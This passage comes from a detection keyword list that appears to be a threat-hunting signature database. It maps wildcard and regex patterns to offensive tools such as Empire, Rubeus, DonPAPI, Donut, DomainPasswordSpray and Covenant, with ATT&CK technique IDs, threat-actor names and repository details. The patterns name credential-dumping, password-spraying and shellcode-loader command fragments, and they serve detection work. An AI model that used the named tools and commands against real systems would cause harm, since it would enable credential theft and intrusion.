*",".{0,1000}\-Domain\s.{0,1000}\s\-AllowDelegation\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-Domain * -SPN *",".{0,1000}\-Domain\s.{0,1000}\s\-SPN\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Domain controller is missing* use --dc.*",".{0,1000}Domain\scontroller\sis\smissing.{0,1000}\suse\s\-\-dc\..{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Domain/CommandCollection*",".{0,1000}Domain\/CommandCollection.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*-domain_admins.txt*",".{0,1000}\-domain_admins\.txt.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*domain_analyzer.py*",".{0,1000}domain_analyzer\.py.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*domain_analyzer-master*",".{0,1000}domain_analyzer\-master.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*domain_hunter-v*.jar",".{0,1000}domain_hunter\-v.{0,1000}\.jar","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*domainDumpConfig*",".{0,1000}domainDumpConfig.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*DomainEnumerator*",".{0,1000}DomainEnumerator.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*domainhunter*",".{0,1000}domainhunter.{0,1000}","offensive_tool_keyword","domainhunter","Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. The primary tool output is a timestamped HTML table style report.","T1568 - T1596 - T1569 - T1593","N/A","N/A","N/A","Information Gathering","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "*domainhunter.py*",".{0,1000}domainhunter\.py.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "*Domaininfo/Domaininfo.py*",".{0,1000}Domaininfo\/Domaininfo\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Domainpassspray*",".{0,1000}Domainpassspray.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainPasswordSpray*",".{0,1000}DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*DomainPasswordSpray.ps1*",".{0,1000}DomainPasswordSpray\.ps1.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*DomainPasswordSpray.ps1*",".{0,1000}DomainPasswordSpray\.ps1.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*DomainRecon*ridbrute*",".{0,1000}DomainRecon.{0,1000}ridbrute.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DomainRecon/ADCS*",".{0,1000}DomainRecon\/ADCS.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DomainRecon/BloodHound*",".{0,1000}DomainRecon\/BloodHound.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DomainRecon/SilentHound*",".{0,1000}DomainRecon\/SilentHound.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DomainRecon\ADCSServer.txt*",".{0,1000}DomainRecon\\ADCSServer\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainRecon\DC-IPs.txt*",".{0,1000}DomainRecon\\DC\-IPs\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainRecon\ExploitableSystems.txt*",".{0,1000}DomainRecon\\ExploitableSystems\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainRecon\OxidBindings.txt*",".{0,1000}DomainRecon\\OxidBindings\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainRecon\Windows_Servers.txt*",".{0,1000}DomainRecon\\Windows_Servers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DomainTrustDiscovery_PowerView.py*",".{0,1000}DomainTrustDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*domcachedump.py*",".{0,1000}domcachedump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*dome.py *",".{0,1000}dome\.py\s.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*DominicBreuker*",".{0,1000}DominicBreuker.{0,1000}","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/DominicBreuker","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*donapapi -pvk *",".{0,1000}donapapi\s\-pvk\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*Done dumping SAM hashes for host: *",".{0,1000}Done\sdumping\sSAM\shashes\sfor\shost\:\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Done! Check for existing lsass.dmp file into current folder*",".{0,1000}Done!\sCheck\sfor\sexisting\slsass\.dmp\sfile\sinto\scurrent\sfolder.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*DoNotUseThisPassword123!*",".{0,1000}DoNotUseThisPassword123!.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*DonPAPI ""$DOMAIN""/*",".{0,1000}DonPAPI\s\""\$DOMAIN\""\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*donpapi -credz *",".{0,1000}donpapi\s\-credz\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*DonPAPI.py *",".{0,1000}DonPAPI\.py\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*donpapi_dump*",".{0,1000}donpapi_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*donpapi-master.zip*",".{0,1000}donpapi\-master\.zip.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*Don't be evil with this. I created this tool to learn*",".{0,1000}Don\'t\sbe\sevil\swith\sthis\.\sI\screated\sthis\stool\sto\slearn.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*DON'T RUN THIS IN YOUR WEB ROOT AS IT WILL OUTPUT ACCESS TOKENS*",".{0,1000}DON\'T\sRUN\sTHIS\sIN\sYOUR\sWEB\sROOT\sAS\sIT\sWILL\sOUTPUT\sACCESS\sTOKENS.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Don't_blindly_trust_obfuscated_code_it_might_do_something_bad*",".{0,1000}Don\'t_blindly_trust_obfuscated_code_it_might_do_something_bad.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*donut -f *.dll -c * -m RunProcess*",".{0,1000}donut\s\-f\s.{0,1000}\.dll\s\-c\s.{0,1000}\s\-m\sRunProcess.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*donut -f c2.dll*",".{0,1000}donut\s\-f\sc2\.dll.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*donut* \DemoCreateProcess.dll *",".{0,1000}donut.{0,1000}\s\\DemoCreateProcess\.dll\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*donut.exe *.exe*",".{0,1000}donut\.exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*DONUT_BYPASS_CONTINUE*",".{0,1000}DONUT_BYPASS_CONTINUE.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*donut-loader -*",".{0,1000}donut\-loader\s\-.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Donut-Loader -process_id*",".{0,1000}Donut\-Loader\s\-process_id.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*DonutLoader(*",".{0,1000}DonutLoader\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*DonutLoader.cs*",".{0,1000}DonutLoader\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*donut-maker.py -*",".{0,1000}donut\-maker\.py\s\-.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*donut-maker.py -i *.exe*",".{0,1000}donut\-maker\.py\s\-i\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*donut-payload.*",".{0,1000}donut\-payload\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation 